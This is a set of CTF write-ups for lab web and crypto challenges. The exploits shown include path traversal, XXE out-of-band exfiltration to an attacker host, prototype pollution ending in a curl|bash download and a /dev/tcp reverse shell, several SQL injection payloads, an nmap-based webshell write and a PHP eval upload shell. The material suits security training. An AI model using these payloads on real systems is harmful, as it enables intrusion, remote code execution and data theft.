xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
version="4.0">
<servlet>
<servlet-name>DownloadServlet</servlet-name>
<servlet-class>cn.abc.servlet.DownloadServlet</servlet-class>
</servlet>

<servlet-mapping>
<servlet-name>DownloadServlet</servlet-name>
<url-pattern>/DownloadServlet</url-pattern>
</servlet-mapping>

<servlet>
<servlet-name>ListFileServlet</servlet-name>
<servlet-class>cn.abc.servlet.ListFileServlet</servlet-class>
</servlet>

<servlet-mapping>
<servlet-name>ListFileServlet</servlet-name>
<url-pattern>/ListFileServlet</url-pattern>
</servlet-mapping>

<servlet>
<servlet-name>UploadServlet</servlet-name>
<servlet-class>cn.abc.servlet.UploadServlet</servlet-class>
</servlet>

<servlet-mapping>
<servlet-name>UploadServlet</servlet-name>
<url-pattern>/UploadServlet</url-pattern>
</servlet-mapping>
</web-app>
```

Use the class names from web.xml to download the compiled classes,

UploadServlet for example:

```
http://ip/DownloadServlet?filename=../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/classes/cn/abc/servlet/UploadServlet.class
```
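Turning web.xml into class paths is mechanical, so here is an added helper (not part of the challenge or of this writeup) that parses a trimmed copy of the web.xml above and emits the traversal URLs. The parameter name filename and the nine ../ segments follow the requests above; the webapp root is an argument because it differs per deployment. It serves the Easy Java section too, where the root is simply / with no traversal and the class lives under com/wm/ctf.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List

# Trimmed copy of the web.xml recovered above (two of its three servlets).
WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="4.0">
  <servlet>
    <servlet-name>DownloadServlet</servlet-name>
    <servlet-class>cn.abc.servlet.DownloadServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>DownloadServlet</servlet-name>
    <url-pattern>/DownloadServlet</url-pattern>
  </servlet-mapping>
  <servlet>
    <servlet-name>UploadServlet</servlet-name>
    <servlet-class>cn.abc.servlet.UploadServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>UploadServlet</servlet-name>
    <url-pattern>/UploadServlet</url-pattern>
  </servlet-mapping>
</web-app>
"""

def servlet_classes(web_xml: str) -> Dict[str, str]:
    """Map each url-pattern to its compiled class file, relative to the webapp root."""
    root = ET.fromstring(web_xml)
    # the Java EE namespace is on every element; pick it up from the root tag
    ns = root.tag[1:root.tag.index("}")] if root.tag.startswith("{") else ""
    q = (lambda t: "{%s}%s" % (ns, t)) if ns else (lambda t: t)
    name_to_class = {
        s.findtext(q("servlet-name")): s.findtext(q("servlet-class"))
        for s in root.iter(q("servlet"))
    }
    out = {}
    for m in root.iter(q("servlet-mapping")):
        cls = name_to_class.get(m.findtext(q("servlet-name")))
        pattern = m.findtext(q("url-pattern"))
        if cls and pattern:
            out[pattern] = "WEB-INF/classes/" + cls.replace(".", "/") + ".class"
    return out

def download_urls(web_xml: str, download_endpoint: str, webapp_root: str, depth: int = 9) -> List[str]:
    """Traversal URLs for the download servlet (parameter name `filename`, as in the requests above).
    `depth` ../ segments are prepended; extra ../ beyond the filesystem root is harmless."""
    prefix = "../" * depth + webapp_root.strip("/") + "/"
    return ["%s?filename=%s%s" % (download_endpoint, prefix, p) for p in servlet_classes(web_xml).values()]

if __name__ == "__main__":
    for url in download_urls(WEB_XML, "http://ip/DownloadServlet", "/usr/local/tomcat/webapps/ROOT"):
        print(url)
```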

Decompile it and refer to Apache-Poi-XXE-Analysis: the upload servlet parses the uploaded spreadsheet with Apache POI.

Request a second intranet host on buuoj to act as the attacker's server:

174.1.112.13

Create test.dtd under /var/www/html:

```xml
<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://174.1.112.13:2999?p=%file;'>">
```

and modify [Content_Types].xml inside the xlsx:

```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE convert [
<!ENTITY % remote SYSTEM "http://174.1.112.13/test.dtd">
%remote;%int;%send;
]>
```

Note: the file name must start with excel- and end with .xlsx.

Upload the xlsx and listen on port 2999; the parameter entity sends the file contents out-of-band in the query string:

```
root@490bb1f24012:/var/www/html# python -m SimpleHTTPServer 2999
Serving HTTP on 0.0.0.0 port 2999 ...
174.1.111.213 - - [21/May/2020 15:55:12] "GET /?p=flag{105d56b3-ae57-40a7-9f4d-5aa0010827ac} HTTP/1.1" 200 -
```
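The OOXML side of the attack, as an added example (not from the writeup or the referenced analysis): the DTD is generated with the same two parameter entities as test.dtd above, and the DOCTYPE is spliced into the existing [Content_Types].xml rather than replacing it, so the rest of the package stays intact for the parser. The sample workbook is constructed inline and is nowhere near a real xlsx; the attacker host and DTD URL are the ones from the writeup. One caveat the writeup skips: %file; is interpolated into a URL, so a target file containing newlines or URL-breaking characters would not arrive intact (the flag here is a single line).

```python
import io
import zipfile

def external_dtd(target_file: str, collector: str) -> str:
    """The DTD served from the attacker host (same two parameter entities as test.dtd above)."""
    return (
        '<!ENTITY %% file SYSTEM "file://%s">\n' % target_file
        + "<!ENTITY %% int \"<!ENTITY &#37; send SYSTEM '%s?p=%%file;'>\">\n" % collector
    )

def inject_doctype(xml: bytes, dtd_url: str) -> bytes:
    """Insert a DOCTYPE that loads the remote DTD and fires %send; directly after the XML declaration."""
    text = xml.decode("utf-8")
    doctype = (
        "<!DOCTYPE convert [\n"
        '<!ENTITY %% remote SYSTEM "%s">\n' % dtd_url
        + "%remote;%int;%send;\n"
        "]>\n"
    )
    if text.startswith("<?xml"):
        end = text.index("?>") + 2          # a DOCTYPE must follow the declaration and precede the root
        return (text[:end] + "\n" + doctype + text[end:].lstrip()).encode("utf-8")
    return (doctype + text).encode("utf-8")

def poison_xlsx(original: bytes, dtd_url: str, part: str = "[Content_Types].xml") -> bytes:
    """Rebuild the OOXML zip, replacing only `part`, so the parser still sees a normal package."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(original)) as src, zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for item in src.infolist():
            data = src.read(item.filename)
            if item.filename == part:
                data = inject_doctype(data, dtd_url)
            dst.writestr(item.filename, data)
    return out.getvalue()

def minimal_xlsx() -> bytes:
    """A constructed, bare-bones stand-in for a workbook: just enough parts to show the rewrite."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
                   '<Default Extension="xml" ContentType="application/xml"/></Types>')
        z.writestr("xl/workbook.xml", '<?xml version="1.0" encoding="UTF-8"?><workbook/>')
    return buf.getvalue()

def read_part(xlsx: bytes, part: str) -> str:
    with zipfile.ZipFile(io.BytesIO(xlsx)) as z:
        return z.read(part).decode("utf-8")

if __name__ == "__main__":
    print(external_dtd("/flag", "http://174.1.112.13:2999"), end="")
    poisoned = poison_xlsx(minimal_xlsx(), "http://174.1.112.13/test.dtd")
    print(read_part(poisoned, "[Content_Types].xml"))
    with open("excel-poc.xlsx", "wb") as f:      # name must match the excel-*.xlsx rule noted above
        f.write(poisoned)
```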

Related reading

Apache-Poi-XXE-Analysis

带外通道技术(OOB)总结

[网鼎杯 2020 朱雀组]phpweb

Read the source through the func and p parameters:

```php
<?php
$disable_fun = array( "exec" , "shell_exec" , "system" , "passthru" , "proc_open" , "show_source" , "phpinfo" , "popen" , "dl" , "eval" , "proc_terminate" , "touch" , "escapeshellcmd" , "escapeshellarg" , "assert" , "substr_replace" , "call_user_func_array" , "call_user_func" , "array_filter" , "array_walk" , "array_map" , "registregister_shutdown_function" , "register_tick_function" , "filter_var" , "filter_var_array" , "uasort" , "uksort" , "array_reduce" , "array_walk" , "array_walk_recursive" , "pcntl_exec" , "fopen" , "fwrite" , "file_put_contents" );
function gettime ( $func , $p ) {
$result = call_user_func ( $func , $p );
$a = gettype ( $result );
if ( $a == "string" ) {
return $result ;
} else {return "" ;}
}
class Test {
var $p = "Y-m-d h:i:s a" ;
var $func = "date" ;
function __destruct () {
if ( $this -> func != "" ) {
echo gettime ( $this -> func , $this -> p );
}
}
}
$func = $_REQUEST [ "func" ];
$p = $_REQUEST [ "p" ];

if ( $func != null ) {
$func = strtolower ( $func );
if (! in_array ( $func , $disable_fun )) {
echo gettime ( $func , $p );
}else {
die( "Hacker..." );
}
}
?>
```

Exploit it through deserialization: unserialize is not on the blacklist, and Test::__destruct() calls gettime() with the object's own func and p without the in_array() check, so a serialized Test whose func is a blacklisted function such as system runs the command when the object is destroyed.

It doesn't seem possible to get a reverse shell on this one.

crypto

[网鼎杯 2020 青龙组]you_raise_me_up

```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from Crypto.Util.number import *
import random

# flag is defined by the challenge and not shown
n = 2 ** 512
m = random.randint(2, n-1) | 1          # random odd base, so m is invertible mod 2^512
c = pow(m, bytes_to_long(flag), n)      # the flag is the exponent
print('m = ' + str(m))
print('c = ' + str(c))

# m = 391190709124527428959489662565274039318305952172936859403855079581402770986890308469084735451207885386318986881041563704825943945069343345307381099559075
# c = 6665851394203214245856789450723658632520816791621796775909766895233000234023642878786025644953797995373211308485605397024123180085924117610802485972584499
```

A discrete logarithm problem: find the exponent x with m^x ≡ c (mod 2^512).

https://blog.csdn.net/qq_41956187/article/details/104981499

If you use log(x, y) from Python's math module directly on this, you'll find it has a size limit; that was what stumped me most during the contest.

I solved it after the contest by following a senior's writeup.

  • Finding the flag

Use SageMath

Simple install and usage example: https://www.jianshu.com/p/ddf9376334cd

```
┌────────────────────────────────────────────────────────────────────┐
│ SageMath version 9.0, Release Date: 2020-01-01
│ Using Python 3.7.3. Type "help()" for help. │
└────────────────────────────────────────────────────────────────────┘
sage: m = 391190709124527428959489662565274039318305952172936859403855079581402770986890308469084735451207885386
....: 318986881041563704825943945069343345307381099559075
sage: c = 6665851394203214245856789450723658632520816791621796775909766895233000234023642878786025644953797995373
....: 211308485605397024123180085924117610802485972584499
sage: n = 2**512
sage: m = Mod(m, n)
sage: c = Mod(c, n)
sage: discrete_log(c, m)
56006392793405651552924479293096841126763872290794186417054288110043102953612574215902230811593957757
```
  • long_to_bytes

pip3 install pycryptodome

```python
from Crypto.Util.number import *
flag = 56006392793405651552924479293096841126763872290794186417054288110043102953612574215902230811593957757
print(long_to_bytes(flag))
```
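The Sage call above hides what is actually computed. Because the modulus is 2^512, the unit group is a 2-group, and Pohlig-Hellman reduces the discrete log to one bit per step; this added Python implementation (not the challenge's code nor a writeup's) does that without Sage and returns None when c is not a power of m. long_to_bytes is reimplemented with int.to_bytes so that no third-party package is needed.

```python
def order_pow2(g: int, k: int) -> int:
    """Return e such that g has multiplicative order 2^e modulo 2^k (g must be odd)."""
    n = 1 << k
    g %= n
    e = 0
    while g != 1:
        g = g * g % n
        e += 1
    return e

def dlog_mod_2k(g: int, h: int, k: int):
    """Solve g^x == h (mod 2^k) for x in [0, ord(g)) by Pohlig-Hellman on the cyclic 2-group <g>.
    Returns None when h does not lie in the subgroup generated by g."""
    n = 1 << k
    g, h = g % n, h % n
    e = order_pow2(g, k)
    g_inv = pow(g, -1, n)
    x = 0
    for i in range(e):
        # strip the bits already found, then project onto the order-2 subgroup:
        # (g^(x' * 2^i))^(2^(e-1-i)) == 1 exactly when bit i of x is 0
        t = h * pow(g_inv, x, n) % n
        if pow(t, 1 << (e - 1 - i), n) != 1:
            x |= 1 << i
    return x if pow(g, x, n) == h else None

def long_to_bytes(x: int) -> bytes:
    """Same conversion as Crypto.Util.number.long_to_bytes, without the dependency."""
    return x.to_bytes((x.bit_length() + 7) // 8, "big")

if __name__ == "__main__":
    m = 391190709124527428959489662565274039318305952172936859403855079581402770986890308469084735451207885386318986881041563704825943945069343345307381099559075
    c = 6665851394203214245856789450723658632520816791621796775909766895233000234023642878786025644953797995373211308485605397024123180085924117610802485972584499
    x = dlog_mod_2k(m, c, 512)
    print(x)
    print(long_to_bytes(x) if x is not None else "c is not in the subgroup generated by m")
```

Each step costs two modular exponentiations on 512-bit numbers, so the whole run takes well under a second; math.log never stood a chance because it works on 53-bit floats, not on the integers themselves.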

[网鼎杯 2020 青龙组]boom

Not recommended to open directly.

0x01

Look the hash up on cmd5:

46e5efe6165a5afb361217446a2dbd01

en5oy

0x02

```
This time:Here are have some formulas                 3x-y+z=185
2x+3y-z=321
x+y+z=173 input: x = 74
input: y = 68
input: z = 31
```

0x03

```
Last time: Kill it
x*x+x-7943722218936282=0
input x: 89127561
```

```python
# brute-force the positive root of x*x + x - 7943722218936282 = 0 (it has 8 digits)
for i in range(10000000, 100000000):
    if i * (i + 1) == 7943722218936282:
        print(i)
        break
```

0x04 Week

web

[网鼎杯 2020 青龙组]notes

References:

https://www.anquanke.com/post/id/204856#h2-2

http://www.luyixian.cn/news_show_381840.aspx

If you're not familiar with prototype pollution, read this article by P神:

Prototype pollution:

https://www.leavesongs.com/PENETRATION/javascript-prototype-pollution-attack.html

  • Source
```javascript
var express = require('express');
var path = require('path');
const undefsafe = require('undefsafe');
const { exec } = require('child_process');


var app = express();
class Notes {
constructor() {
this.owner = "whoknows";
this.num = 0;
this.note_list = {};
}

write_note(author, raw_note) {
this.note_list[(this.num++).toString()] = {"author": author,"raw_note":raw_note};
}

get_note(id) {
var r = {}
undefsafe(r, id, undefsafe(this.note_list, id));
return r;
}

edit_note(id, author, raw) {
undefsafe(this.note_list, id + '.author', author);
undefsafe(this.note_list, id + '.raw_note', raw);
}

get_all_notes() {
return this.note_list;
}

remove_note(id) {
delete this.note_list[id];
}
}

var notes = new Notes();
notes.write_note("nobody", "this is nobody's first note");


app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'pug');

app.use(express.json());
app.use(express.urlencoded({ extended: false }));
app.use(express.static(path.join(__dirname, 'public')));


app.get('/', function(req, res, next) {
res.render('index', { title: 'Notebook' });
});

app.route('/add_note')
.get(function(req, res) {
res.render('mess', {message: 'please use POST to add a note'});
})
.post(function(req, res) {
let author = req.body.author;
let raw = req.body.raw;
if (author && raw) {
notes.write_note(author, raw);
res.render('mess', {message: "add note sucess"});
} else {
res.render('mess', {message: "did not add note"});
}
})

app.route('/edit_note')
.get(function(req, res) {
res.render('mess', {message: "please use POST to edit a note"});
})
.post(function(req, res) {
let id = req.body.id;
let author = req.body.author;
let enote = req.body.raw;
if (id && author && enote) {
notes.edit_note(id, author, enote);
res.render('mess', {message: "edit note sucess"});
} else {
res.render('mess', {message: "edit note failed"});
}
})

app.route('/delete_note')
.get(function(req, res) {
res.render('mess', {message: "please use POST to delete a note"});
})
.post(function(req, res) {
let id = req.body.id;
if (id) {
notes.remove_note(id);
res.render('mess', {message: "delete done"});
} else {
res.render('mess', {message: "delete failed"});
}
})

app.route('/notes')
.get(function(req, res) {
let q = req.query.q;
let a_note;
if (typeof(q) === "undefined") {
a_note = notes.get_all_notes();
} else {
a_note = notes.get_note(q);
}
res.render('note', {list: a_note});
})

app.route('/status') // the interesting route
.get(function(req, res) {
let commands = {
"script-1": "uptime",
"script-2": "free -m"
};
for (let index in commands) {
exec(commands[index], {shell:'/bin/bash'}, (err, stdout, stderr) => {
if (err) {
return;
}
console.log(`stdout: ${stdout}`);
});
}
res.send('OK');
res.end();
})


app.use(function(req, res, next) {
res.status(404).send('Sorry cant find that!');
});


app.use(function(err, req, res, next) {
console.error(err.stack);
res.status(500).send('Something broke!');
});


const port = 8080;
app.listen(port, () => console.log(`Example app listening at http://localhost:${port}`))
```
Pollute the prototype through /edit_note: undefsafe() treats id + '.author' as a property path, so with id=__proto__.abc it walks note_list.__proto__ (Object.prototype), finds no abc there and assigns the author string to it. Then hit /status: its for...in loop over commands also enumerates the inherited abc key and exec()s its value with /bin/bash.

```
id=__proto__.abc&author=curl%20http://174.1.147.117/shell.txt|bash&raw=a

//shell.txt
bash -i >& /dev/tcp/174.1.147.117/9999 0>&1
```

[极客大挑战 2019]HardSQL

```http
GET /check.php?username=aaa&password=0%27or%281%29%23 HTTP/1.1
Host: d54eb507-84b5-4c04-a0ee-f9981df4dc65.node3.buuoj.cn
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.26 Safari/537.36 Edg/85.0.564.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close


HTTP/1.1 200 OK
Server: openresty
Date: Mon, 27 Jul 2020 16:54:55 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 550
Connection: close
X-Powered-By: PHP/7.3.11

<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>check</title>
</head>
<div style="position: absolute;bottom: 0;width: 99%;"><p align="center" style="font:italic 15px Georgia,serif;color:white;"> Syclover @ cl4y</p></div>

<body background='./image/background.jpg' style='background-repeat:no-repeat ;background-size:100% 100%; background-attachment: fixed;'>
<br><br><br>
<h1 style='font-family:verdana;color:red;text-align:center;font-size:40px;'>Login Success!!</h1>
</br>
</body>

</html>
```
The payloads avoid spaces and =, wrapping every piece in parentheses and using like instead; extractvalue() reports only 32 characters of the XPath, so the flag is read in two halves with right() and left():

```
http://d54eb507-84b5-4c04-a0ee-f9981df4dc65.node3.buuoj.cn/check.php?username=1&password='or(extractvalue(0x0a%2Cconcat(0x0a%2C(select(database())))))%23
#XPATH syntax error: ' geek'

http://d54eb507-84b5-4c04-a0ee-f9981df4dc65.node3.buuoj.cn/check.php?username=1&password='or(extractvalue(0x0a%2Cconcat(0x0a%2C(select(group_concat(column_name))from(information_schema.columns)where((table_schema)like(database()))))))%23
#XPATH syntax error: ' id,username,password'

http://d54eb507-84b5-4c04-a0ee-f9981df4dc65.node3.buuoj.cn/check.php
?username=1
&password='or(extractvalue(0x0a%2Cconcat(0x0a%2C(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like(database()))))))%23
#XPATH syntax error: ' H4rDsq1'

http://d54eb507-84b5-4c04-a0ee-f9981df4dc65.node3.buuoj.cn/check.php
?username=1
&password='or(extractvalue(0x0a%2Cconcat(0x0a%2C(select(password)from(H4rDsq1)))))%23
#XPATH syntax error: ' flag{9dd67d66-6e19-45bb-9beb-39'

http://d54eb507-84b5-4c04-a0ee-f9981df4dc65.node3.buuoj.cn/check.php
?username=1
&password='or(extractvalue(0x0a%2Cright(concat(0x0a%2C(select(password)from(H4rDsq1)))%2C36)))%23
#XPATH syntax error: 'e19-45bb-9beb-39d277a60ac9}'
# flag{9dd67d66-6e19-45bb-9beb-39d277a60ac9}
http://d54eb507-84b5-4c04-a0ee-f9981df4dc65.node3.buuoj.cn/check.php?username=1&password='or(extractvalue(0x0a%2Cright(concat(0x0a%2C(select(group_concat(schema_name))from(information_schema.schemata)))%2C32)))%23
#XPATH syntax error: ',test,geek'

http://d54eb507-84b5-4c04-a0ee-f9981df4dc65.node3.buuoj.cn/check.php?username=1&password='or(extractvalue(0x0a%2Cleft(concat(0x0a%2C(select(group_concat(schema_name))from(information_schema.schemata)))%2C32)))%23
#XPATH syntax error: ' information_schema,mysql,perfor'
```

[BUUCTF 2018]Online Tool

The sorrow of PHP escapeshellarg()+escapeshellcmd()

On escapeshellarg bypasses and argument injection vulnerabilities

  • Source code
<?php

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}
  • nmap usage
OUTPUT:
-oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3,
and Grepable format, respectively, to the given filename.

Use the OUTPUT option to write the scan record to a file and thereby construct webshell.php (screenshot omitted).

The webshell is passed as the IP to scan and saved into 1.php.

  • Initial idea

The original idea was to execute a second command, but the manual says:

escapeshellcmd() escapes any characters in a string that might be used to trick a shell command into executing arbitrary commands. This function should be used to make sure that any data coming from user input is escaped before it is passed to the exec() or system() functions, or to the backtick operator.

The following characters are preceded by a backslash: &#;`|*?~<>^()[]{}$\, \x0A and \xFF. ' and " are escaped only if they are not paired. On Windows platforms, all these characters plus % and ! are replaced by a space instead.

That route is closed.

Change of approach: write a webshell. I did not think of this at first and only learned it from other people's blogs.

  • Overall approach:

Use escapeshellarg()+escapeshellcmd() to bypass the ',

string(9) "1' new_IP"
string(14) "'1'\'' new_IP'"
string(16) "'1'\\'' new_IP\'" # '1'\\'' == '1'+\\''
you are in sandbox 6e0de596e0dfd3884f1d7cc901ead8d9
string(53) "nmap -T5 -sT -Pn --host-timeout 2 -F '1'\\'' new_IP\'"

In the nmap command, '1'\\'' == '1' + the escaped \ + '' (which is empty).

In addition, for new_IP\'" the trailing ' can also be used for the bypass, as follows:

string(23) "1' new_IP -oG new.php '"
string(31) "'1'\'' new_IP -oG new.php '\'''"
string(33) "'1'\\'' new_IP -oG new.php '\\'''"
you are in sandbox 6e0de596e0dfd3884f1d7cc901ead8d9
string(70) "nmap -T5 -sT -Pn --host-timeout 2 -F '1'\\'' new_IP -oG new.php '\\'''"

This lets us construct a second "IP" to be scanned, which is the webshell.

As follows:

1' <?php phpinfo();?> -oG new.php '

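As an added example (not the challenge's own code), the PHP below reproduces the escaping chain on the write-up's input "1' new_IP" and contrasts it with the defensive alternative: validate the host as an IP literal or plain hostname, then quote it once with escapeshellarg() only. The function names are assumptions.

```php
<?php
// Added example, not part of the challenge source. Reproduces the
// escapeshellarg()+escapeshellcmd() chain and contrasts it with a
// validate-then-quote-once approach. Function names are assumptions.

// The challenge's chain: quote the whole value, then escape it again.
function challenge_escape(string $host): string
{
    return escapeshellcmd(escapeshellarg($host));
}

// Hardened variant: refuse anything that is not an IP literal or a
// plain DNS hostname, then quote it exactly once. escapeshellarg()
// alone already turns the value into a single shell word.
function safe_scan_target(string $host): ?string
{
    $isIp  = filter_var($host, FILTER_VALIDATE_IP) !== false;
    $label = '[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    $isName = strlen($host) <= 253
        && preg_match('/^' . $label . '(\.' . $label . ')*$/', $host) === 1;
    if (!$isIp && !$isName) {
        return null;   // reject outright; do not try to "clean" the value
    }
    return escapeshellarg($host);
}

// Input from the write-up: a quote followed by a second "IP".
$input = "1' new_IP";

// escapeshellarg() wraps the value as '1'\'' new_IP' (one shell word).
// escapeshellcmd() then escapes the backslash and the now-unpaired final
// quote, so the shell sees the word '1' and new_IP as a separate argument.
echo challenge_escape($input), "\n";

// Rejected: the quote and the space are not valid in an IP or hostname.
var_dump(safe_scan_target($input));

// Accepted and quoted once (example.org and 192.0.2.10 are documentation names).
var_dump(safe_scan_target('scanme.example.org'));
var_dump(safe_scan_target('192.0.2.10'));
```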

[ACTF2020 新生赛]Upload

POST / HTTP/1.1
Host: 4bcd4b52-7c7b-4c97-82b3-086876b461be.node3.buuoj.cn
Content-Length: 324
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://4bcd4b52-7c7b-4c97-82b3-086876b461be.node3.buuoj.cn
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryR0XkBShZAZ5y7Yfn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.26 Safari/537.36 Edg/85.0.564.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://4bcd4b52-7c7b-4c97-82b3-086876b461be.node3.buuoj.cn/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

------WebKitFormBoundaryR0XkBShZAZ5y7Yfn
Content-Disposition: form-data; name="upload_file"; filename="fe1w0.phtml"
Content-Type: image/jpeg


<?php
eval($_GET[xz]);
?>
------WebKitFormBoundaryR0XkBShZAZ5y7Yfn
Content-Disposition: form-data; name="submit"

upload
------WebKitFormBoundaryR0XkBShZAZ5y7Yfn--

Front-end check + back-end blacklist.

[GXYCTF2019]BabySQli

  • search.php
MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5
# base32
c2VsZWN0ICogZnJvbSB1c2VyIHdoZXJlIHVzZXJuYW1lID0gJyRuYW1lJw==
# base64
select * from user where username = '$name'

Without being told, the full code logic of this challenge is a bit of a trap.

The following code is from the BUU link; I do not know whether it was available during the actual competition.

<!--MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5-->
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Do you know who am I?</title>
<?php
require "config.php";
require "flag.php";

// undo magic-quotes escaping
if (get_magic_quotes_gpc()) {
    function stripslashes_deep($value)
    {
        $value = is_array($value) ?
            array_map('stripslashes_deep', $value) :
            stripslashes($value);
        return $value;
    }

    $_POST = array_map('stripslashes_deep', $_POST);
    $_GET = array_map('stripslashes_deep', $_GET);
    $_COOKIE = array_map('stripslashes_deep', $_COOKIE);
    $_REQUEST = array_map('stripslashes_deep', $_REQUEST);
}

mysqli_query($con,'SET NAMES UTF8');
$name = $_POST['name'];
$password = $_POST['pw'];
$t_pw = md5($password);
$sql = "select * from user where username = '".$name."'";
// echo $sql;
$result = mysqli_query($con, $sql);


if(preg_match("/\(|\)|\=|or/", $name)){
    die("do not hack me!");
}
else{
    if (!$result) {
        printf("Error: %s\n", mysqli_error($con));
        exit();
    }
    else{
        // echo '<pre>';
        $arr = mysqli_fetch_row($result);
        // print_r($arr);
        if($arr[1] == "admin"){
            if(md5($password) == $arr[2]){
                echo $flag;
            }
            else{
                die("wrong pass!");
            }
        }
        else{
            die("wrong user!");
        }
    }
}

?>
  • The verification logic of this challenge

    • First, query the record where username=$user and convert it to an array
    • If $user matches the blacklist, error out
    • Otherwise, check md5($pw) == password
    • On success, return the flag
  • Idea

Insert a row into the result set obtained in the first step, e.g.:

mysql> select 'admin',md5('fe1w0');
+-------+----------------------------------+
| admin | md5('fe1w0') |
+-------+----------------------------------+
| admin | d49fd2c918d8ab7c3b8111269023f888 |
+-------+----------------------------------+
1 row in set (0.00 sec)

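The same login flow with both weaknesses removed, as an added example that is not the challenge's code: in the original, $name is concatenated into the SQL, so a UNION can return a fabricated row whose username and hash columns the attacker chose, and the md5($password) == $arr[2] check then compares against the attacker's own hash. This version binds the name as a parameter and verifies against a stored password_hash() value; the `user(id, username, password)` schema with hashed passwords is a hypothetical assumption.

```php
<?php
// Added example, not the challenge's own code. Assumes a `user` table
// (id, username, password) whose password column holds password_hash()
// output; $con is an existing mysqli connection as in config.php.

function authenticate(mysqli $con, string $name, string $password): bool
{
    // The name travels as a bound parameter: it can never change the
    // shape of the query, so only genuine rows can come back.
    $stmt = $con->prepare(
        'SELECT username, password FROM user WHERE username = ? LIMIT 1'
    );
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('s', $name);
    $stmt->execute();
    $stmt->bind_result($dbUser, $dbHash);
    $found = $stmt->fetch();
    $stmt->close();

    if (!$found) {
        return false;
    }
    // Strict comparison for the username (no loose ==) and a salted,
    // constant-time password check instead of comparing raw md5 strings.
    return $dbUser === 'admin' && password_verify($password, $dbHash);
}

// Usage sketch matching the challenge's flow:
// if (authenticate($con, $_POST['name'] ?? '', $_POST['pw'] ?? '')) {
//     echo $flag;
// } else {
//     die('wrong user or pass!');
// }
```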

[GYCTF2020]Blacklist

  • Blacklist
return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);
  • Stacked injection + HANDLER

MySQL query statement: HANDLER

  • payload
http://d819a190-8282-41a9-90a8-72af5b375e27.node3.buuoj.cn/?inject=-1';HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;

[0CTF 2016]piapiapia

PS D:\fe1w0\tool\web & permeation\dirpath_search\dirsearch> python3 .\dirsearch.py -u "http://6e4630e8-a6e7-4e79-8b69-cc8f03111332.node3.buuoj.cn/" -e php --delay=0.5

The scan result reveals a www.zip file.

Rough flow:

  • register
  • login: obtain a session
  • update: update the profile information and store the serialized profile
  • profile: unserialize the stored profile

Vulnerabilities:

  • class.php - class mysql
public function update($table, $key, $value, $where) {
    $sql = "UPDATE $table SET $key = '$value' WHERE $where";
    return mysql_query($sql);
}

public function filter($string) {
    $escape = array('\'', '\\\\');
    $escape = '/' . implode('|', $escape) . '/'; // i.e. the pattern /'|\\/ : a single quote or a backslash
    $string = preg_replace($escape, '_', $string);

    $safe = array('select', 'insert', 'update', 'delete', 'where');
    $safe = '/' . implode('|', $safe) . '/i'; // i.e. /select|insert|update|delete|where/i
    return preg_replace($safe, 'hacker', $string);
}
  • class.php - class user
public function show_profile($username) {
    $username = parent::filter($username);

    $where = "username = '$username'";
    $object = parent::select($this->table, $where);
    return $object->profile;
}
public function update_profile($username, $new_profile) {
    $username = parent::filter($username);
